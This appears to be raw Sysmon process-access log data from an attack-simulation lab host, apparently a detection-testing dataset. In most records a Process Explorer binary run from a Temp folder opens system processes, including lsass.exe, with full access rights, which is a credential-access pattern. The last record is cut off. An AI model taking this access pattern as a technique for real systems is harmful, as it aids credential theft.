10341000x8000000000000000791851Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:57.751{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2900-00000000A301}2724C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791850Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:57.751{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2800-00000000A301}1980C:\Windows\System32\spoolsv.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791849Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:57.751{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1523-600B-2600-00000000A301}3012C:\Windows\System32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791848Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:57.735{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151F-600B-2400-00000000A301}2896C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791847Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:57.735{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151F-600B-2300-00000000A301}2888C:\Users\Public\splunkd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791846Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:57.735{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151B-600B-2100-00000000A301}2328C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791845Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:57.735{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1700-00000000A301}1636C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791844Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:57.735{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1600-00000000A301}1528C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791843Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:57.735{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1500-00000000A301}1480C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791842Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:57.735{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1400-00000000A301}1276C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791841Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:57.735{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1300-00000000A301}1200C:\Windows\System32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791840Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:57.735{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1200-00000000A301}1192C:\Windows\system32\dwm.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791839Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:57.735{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1100-00000000A301}1160C:\Windows\System32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791838Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:57.735{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1000-00000000A301}1152C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791837Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:57.735{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-0F00-00000000A301}1120C:\Windows\System32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791836Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:57.735{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-0E00-00000000A301}1076C:\Windows\system32\LogonUI.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791835Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:57.735{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-0D00-00000000A301}624C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791834Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:57.735{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-0C00-00000000A301}584C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791833Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:57.735{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1518-600B-0B00-00000000A301}856C:\Windows\system32\lsass.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791832Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:57.735{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1518-600B-0A00-00000000A301}848C:\Windows\system32\services.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a56b4|C:\Windows\System32\KERNELBASE.dll+25803|C:\Windows\System32\KERNEL32.DLL+169c0|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a0806|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791831Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:57.735{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1518-600B-0900-00000000A301}796C:\Windows\system32\winlogon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791830Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:57.735{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1518-600B-0800-00000000A301}720C:\Windows\system32\csrss.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a56b4|C:\Windows\System32\KERNELBASE.dll+25803|C:\Windows\System32\KERNEL32.DLL+169c0|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a0806|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791829Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:57.735{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1518-600B-0700-00000000A301}712C:\Windows\system32\wininit.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a56b4|C:\Windows\System32\KERNELBASE.dll+25803|C:\Windows\System32\KERNEL32.DLL+169c0|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a0806|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791828Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:57.735{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1517-600B-0500-00000000A301}640C:\Windows\system32\csrss.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a56b4|C:\Windows\System32\KERNELBASE.dll+25803|C:\Windows\System32\KERNEL32.DLL+169c0|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a0806|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791827Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:57.735{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1514-600B-0200-00000000A301}448C:\Windows\System32\smss.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a56b4|C:\Windows\System32\KERNELBASE.dll+25803|C:\Windows\System32\KERNEL32.DLL+169c0|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a0806|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791826Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:57.735{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1514-600B-0100-00000000A301}4System0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a56b4|C:\Windows\System32\KERNELBASE.dll+25803|C:\Windows\System32\KERNEL32.DLL+169c0|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a0806|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791825Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:57.720{732C744F-151A-600B-1600-00000000A301}15285192C:\Windows\system32\svchost.exe{732C744F-3269-6010-E4A2-00000000A301}6804C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791824Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:57.720{732C744F-151A-600B-1600-00000000A301}15281564C:\Windows\system32\svchost.exe{732C744F-3269-6010-E4A2-00000000A301}6804C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791823Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:57.720{732C744F-151A-600B-1600-00000000A301}15285192C:\Windows\system32\svchost.exe{732C744F-3269-6010-E2A2-00000000A301}7240C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791822Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:57.720{732C744F-151A-600B-1600-00000000A301}15281564C:\Windows\system32\svchost.exe{732C744F-3269-6010-E2A2-00000000A301}7240C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791821Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:57.720{732C744F-3269-6010-E4A2-00000000A301}68043960C:\Windows\system32\conhost.exe{732C744F-3269-6010-E3A2-00000000A301}2476C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791820Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:57.720{732C744F-3269-6010-E2A2-00000000A301}72402848C:\Windows\system32\conhost.exe{732C744F-3269-6010-E1A2-00000000A301}5600C:\Windows\System32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791819Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:57.704{732C744F-17DF-600B-9401-00000000A301}5084884C:\Windows\system32\csrss.exe{732C744F-3269-6010-E4A2-00000000A301}6804C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000791818Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:57.704{732C744F-17DF-600B-9401-00000000A301}50844708C:\Windows\system32\csrss.exe{732C744F-3269-6010-E3A2-00000000A301}2476C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000791817Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:57.704{732C744F-151A-600B-0C00-00000000A301}5846780C:\Windows\system32\svchost.exe{732C744F-152A-600B-3100-00000000A301}2448C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791816Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:57.704{732C744F-151A-600B-0C00-00000000A301}5846780C:\Windows\system32\svchost.exe{732C744F-152A-600B-3100-00000000A301}2448C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791815Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:57.704{732C744F-151A-600B-0C00-00000000A301}5846780C:\Windows\system32\svchost.exe{732C744F-152A-600B-3100-00000000A301}2448C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791814Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 